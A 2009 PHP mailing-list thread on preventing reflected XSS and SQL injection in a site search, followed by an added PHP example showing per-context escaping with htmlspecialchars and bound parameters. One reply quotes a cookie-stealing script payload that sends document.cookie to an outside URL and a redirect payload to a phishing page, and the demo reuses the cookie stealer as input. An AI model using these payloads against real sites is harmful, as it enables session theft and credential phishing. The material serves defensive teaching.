On Wed, 2009-06-10 at 19:23 +0200, Nitsan Bin-Nun wrote:
> You can write a cookie stealer in a few moments using XSS:
> <script>
> document.location="http://php.net/cookiestealer.php?cookie="+document.cookie;
> </script>
>
> It's not that hard ;)
>
> If I saw such an XSS vulnerability I would add something like:
> youwebsite.com/index.php?searchquery=<script>window.location="http://myphishingpage.com";</script>
>
> (of course everything will be URL encoded, etc.)
>
> Then your users will be redirected through YOUR domain name to my
> webpage, which will contain an exact copy of your page and will
> require users to re-login to the system ;)
> (and log their login information)
>
> There are tons of options, I have investigated one of them, just make
> sure your input is what it should be and you will be good (also make
> sure you don't execute your input in any way, neither at
> exec()/system()/eval() nor in a database query).
>
> (by the way, are you aware of XSRF/CSRF??)
>
> HTH,
> Nitsan
>
> On Wed, Jun 10, 2009 at 7:09 PM, Ashley Sheridan
> <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> >
> > On Wed, 2009-06-10 at 12:55 -0400, Eddie Drapkin wrote:
> > > The problem with using a database escaping string for output escaping
> > > is that something like (despite being the world's lamest XSS)
> > > <script>
> > > location.href('google.com')
> > > </script>
> > > would output mostly the same, and with some cleverness it wouldn't be
> > > too hard to get that to function properly as a full-fledged XSS
> > > attack. I'd personally use one of the FILTER_* constants in
> > > conjunction with the filter functions themselves, say filter_var and
> > > FILTER_SANITIZE_SPECIAL_CHARS.
> > >
> > > On Wed, Jun 10, 2009 at 12:44 PM, Ashley Sheridan
> > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> > > On Wed, 2009-06-10 at 18:28 +0200, Nitsan Bin-Nun wrote:
> > > > mysql_real_escape_string() only sanitises the input. I would
> > > > personally only allow [a-zA-Z0-9-_] in the search string, but that's
> > > > just me ;)
> > > > Validate the input in some way, or make extra sanitisation of it
> > > > before running the search query.
> > > >
> > > > Regarding the HTML output, just entities() it and you'll be good :)
> > > >
> > > > On Wed, Jun 10, 2009 at 6:32 PM, Ashley Sheridan
> > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> > > >
> > > > On Wed, 2009-06-10 at 18:18 +0200, Nitsan Bin-Nun wrote:
> > > > > As for the output, just html entities () it and you will be good.
> > > > >
> > > > > You'd better check the search query for SQL injection, which is
> > > > > more dangerous.
> > > > >
> > > > > HTH
> > > > > Nitsan
> > > > >
> > > > > On Wed, Jun 10, 2009 at 6:19 PM, Ashley Sheridan
> > > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> > > > > Hi all,
> > > > >
> > > > > I'm looking at adding a new search feature to my site, and one of
> > > > > the elements of this is to echo back, in the search results page,
> > > > > the original string the user searched for. Up until now, XSS
> > > > > hasn't (afaik) been an issue for my site, but I can see from a
> > > > > mile off this will be. What would you guys recommend to avoid
> > > > > this?
> > > > >
> > > > > I'd thought initially of using a mixture of html_special_chars()
> > > > > and a regex (as yet not sure what I'll be stripping out with
> > > > > this) to sanitise the output for display on the results page,
> > > > > but is this enough?
> > > > >
> > > > > Thanks
> > > > > Ash
> > > > > www.ashleysheridan.co.uk
> > > >
> > > > I always use mysql_real_escape_string() for that sort of thing, not
> > > > had a problem with it, but is there anything you think I should be
> > > > wary of?
> > > >
> > > > Thanks
> > > > Ash
> > > > www.ashleysheridan.co.uk
> > >
> > > [just bringing it back on list]
> > >
> > > Well, I don't understand, what is the problem with
> > > mysql_real_escape_string() for sanitising input to use for a search?
> > > It should escape anything out so that the query can't be used in
> > > ways that I don't want, no?
> > >
> > > I'd thought about using a whitelist-only regex, but that seems a
> > > little limiting tbh, and as my site contains code, it's not
> > > unreasonable to expect some people might want to search for
> > > particular code excerpts.
> > >
> > > Thanks
> > > Ash
> > > www.ashleysheridan.co.uk
> > >
> > > --
> > > PHP General Mailing List (http://www.php.net/)
> > > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> > Oh no, I think I'm misunderstood here. I was going to use
> > mysql_real_escape_string only for the database input, and use
> > htmlentities for the display output, as essentially they are separate,
> > and should be treated as such.
> >
> > I've been doing a bit of reading, and I can't really understand why XSS
> > is such an issue. Sure, if a user can insert a <script> tag, what
> > difference will that make to anyone else, as it is only on their own
> > browser?
> >
> > Thanks
> > Ash
> > www.ashleysheridan.co.uk

That would only work if you gave out the link to people who expected to
see my site. It wouldn't be permanently on my site unless I had a serious
hole with saving content to the database my site is driven from.

Thanks
Ash
www.ashleysheridan.co.uk
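The thread settles on one point worth seeing in code: the search string lives in two different contexts (the SQL query and the HTML results page) and each needs its own escaping at the point of use, applied to the same unmodified raw string. The example below is added here and is not code from the thread or from Ashley's site. It shows the reflected payload from Nitsan's message arriving as the search term, the vulnerable echo beside the escaped one, and the database side handled with a bound parameter against a constructed in-memory SQLite table (a stand-in for the MySQL table and mysql_real_escape_string() discussed in the thread, chosen so the script runs offline; it needs PHP with pdo_sqlite). The table, its rows, and the helper names h(), search() and make_db() are all mine.

```php
<?php
// Added example (not from the thread): one raw search string, two contexts.
//   SQL context  -> bound parameter in a prepared statement
//                   (PDO + in-memory SQLite stand-in; assumption: pdo_sqlite present)
//   HTML context -> htmlspecialchars() with ENT_QUOTES and an explicit charset
// The raw string is never stripped or rewritten, so searching for a code
// excerpt still works, which a [a-zA-Z0-9_-] whitelist would not allow.
declare(strict_types=1);

// --- HTML context -----------------------------------------------------------

// Vulnerable: the search term is written straight into the page. A payload in
// ?searchquery= is reflected as live markup (reflected XSS).
function render_results_vulnerable(string $q, int $count): string
{
    return "<p>Results for \"{$q}\": {$count} found</p>";
}

// Hardened: escape for the HTML text/attribute context at output time.
// ENT_QUOTES also escapes single quotes (needed inside attributes);
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_results(string $q, int $count): string
{
    return '<p>Results for "' . h($q) . '": ' . $count . ' found</p>';
}

// --- SQL context ------------------------------------------------------------

// Constructed sample table; one row deliberately contains PHP code so the
// "search for a code excerpt" case from the thread can be exercised.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO posts (body) VALUES (:body)');
    $rows = [
        'How to use <?php echo $x; ?> in a template',
        'Never build $sql = "SELECT * FROM t WHERE a=\'$a\'" from raw input',
        'Unrelated post about cats',
    ];
    foreach ($rows as $body) {
        $ins->execute([':body' => $body]);
    }
    return $db;
}

// The search term is a bound value, never part of the SQL text. LIKE's own
// metacharacters (% and _) are escaped so they are matched literally too.
function search(PDO $db, string $q): array
{
    $like = '%' . addcslashes($q, '%_\\') . '%';
    $stmt = $db->prepare("SELECT id, body FROM posts WHERE body LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Demo (php this_file.php) -----------------------------------------------

$db = make_db();

// 1. The cookie-stealer payload from the thread, as it would arrive in the URL.
$payload = '<script>document.location="http://php.net/cookiestealer.php?cookie="+document.cookie;</script>';
echo "Vulnerable: " . render_results_vulnerable($payload, 0) . "\n";
echo "Hardened:   " . render_results($payload, 0) . "\n";

// 2. An injection attempt is just data to the bound query: no error, no match.
$inj = "' OR 1=1 --";
printf("Injection attempt matched %d row(s)\n", count(search($db, $inj)));

// 3. A code excerpt, full of characters a whitelist would reject, still matches.
$code = '<?php echo $x; ?>';
$rows = search($db, $code);
printf("Code search matched %d row(s)\n", count($rows));
foreach ($rows as $r) {
    echo '  ' . h($r['body']) . "\n";   // escaped again for HTML output
}
```

Two things the example makes concrete. First, the attack Ashley asks about is delivered by the URL, so render_results_vulnerable() is enough for the thread's phishing redirect even though nothing is stored in the database; only the escaped render_results() version neutralises it. Second, keeping the raw string and escaping per context lets users search for "<?php echo $x; ?>" verbatim, which is exactly the case Ashley gave against a whitelist-only regex; htmlspecialchars() on output and a bound parameter on the query need no agreement on what characters are "allowed".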